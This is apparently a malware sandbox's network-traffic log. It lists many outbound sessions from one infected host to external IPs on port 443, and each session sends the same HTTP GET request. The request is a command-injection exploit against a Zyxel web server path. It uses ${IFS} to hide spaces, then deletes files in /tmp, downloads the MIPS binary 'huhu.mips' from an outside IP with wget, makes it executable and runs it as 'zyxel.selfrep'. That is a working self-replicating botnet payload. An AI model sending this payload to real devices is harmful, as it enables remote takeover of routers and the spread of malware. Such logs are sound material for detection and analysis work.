                                            Feb 2, 2024 06:21:21.831332922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6796192.168.2.154806066.68.126.42443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.831366062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6797192.168.2.1533780193.109.53.94443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.831398964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6798192.168.2.1534716124.176.67.15443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.831439972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6799192.168.2.1555564184.21.133.227443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.831490040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6800192.168.2.1536718165.221.33.48443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.831512928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6801192.168.2.1551986135.125.157.16443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.831573963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6802192.168.2.153397286.73.3.33443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.831599951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6803192.168.2.15420241.240.104.178443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.831635952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6804192.168.2.1555116179.108.90.64443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.831682920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6805192.168.2.1554956200.19.210.239443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.831705093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6806192.168.2.1537238186.232.109.92443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.831752062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6807192.168.2.1536596196.163.224.242443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.831805944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6808192.168.2.1551182199.165.4.78443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.831851959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6809192.168.2.154815646.200.15.169443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.831871986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6810192.168.2.1552524125.91.5.242443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.831909895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6811192.168.2.155205066.190.12.25443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.831943035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6812192.168.2.1545366191.116.28.1443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.831978083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6813192.168.2.154749619.113.169.140443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.832021952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6814192.168.2.1544328192.223.243.103443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.832076073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6815192.168.2.153779234.62.217.226443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.832119942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6816192.168.2.155466823.237.126.217443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.832149029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6817192.168.2.153927213.7.189.68443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.832190990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6818192.168.2.1559450203.242.40.89443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.832217932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6819192.168.2.1560982198.136.228.241443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.832254887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6820192.168.2.1536396206.15.42.168443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.832292080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6821192.168.2.153899431.121.147.211443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.832329988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6822192.168.2.155278852.57.215.193443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.832369089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6823192.168.2.155534283.14.255.104443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.832391977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6824192.168.2.1545468142.173.227.189443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.832438946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6825192.168.2.1543174188.66.5.171443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.832473993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6826192.168.2.1553760175.238.202.198443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.832494974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6827192.168.2.154682485.18.57.202443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.832562923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6828192.168.2.1536014138.131.133.5443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.832583904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6829192.168.2.15505745.176.166.28443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.832628012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6830192.168.2.155174463.235.169.198443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.832665920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6831192.168.2.1542418208.49.117.38443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.832700968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6832192.168.2.155945678.72.195.199443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.832737923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6833192.168.2.155343449.252.229.134443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.832767010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6834192.168.2.1558292133.213.230.162443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.832806110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6835192.168.2.1556124117.199.210.100443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.832811117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6836192.168.2.154201419.38.9.183443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.832844019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6837192.168.2.154364440.174.103.128443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.832897902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6838192.168.2.1549568156.215.21.21443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.832921028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6839192.168.2.1536852161.93.243.190443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.832952976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6840192.168.2.1543918170.253.49.212443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.833003998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6841192.168.2.155127673.254.11.32443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.833024979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6842192.168.2.1545944188.137.216.120443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.833070993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6843192.168.2.1546316157.48.52.105443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.833110094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6844192.168.2.154038013.234.212.202443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.833143950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6845192.168.2.1550352154.16.118.135443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.833197117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6846192.168.2.1533686222.16.135.72443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.833231926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6847192.168.2.1548654146.46.162.68443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.833266020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6848192.168.2.1551962170.158.204.206443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.833300114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6849192.168.2.1541698171.43.111.68443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.833329916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6850192.168.2.1536124165.118.119.174443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.833384991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6851192.168.2.1544808105.255.255.127443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.833426952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6852192.168.2.154389643.10.66.214443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.833448887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6853192.168.2.154299436.40.70.145443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.833489895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6854192.168.2.1544338222.159.64.4443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.833517075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6855192.168.2.155368824.21.238.161443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.833549976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6856192.168.2.155582685.140.149.104443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.833595991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6857192.168.2.1550208117.126.119.240443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.833631039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6858192.168.2.155751473.55.170.157443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:21.833655119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6859192.168.2.1550374208.160.147.188443
                                            TimestampBytes transferredDirectionData
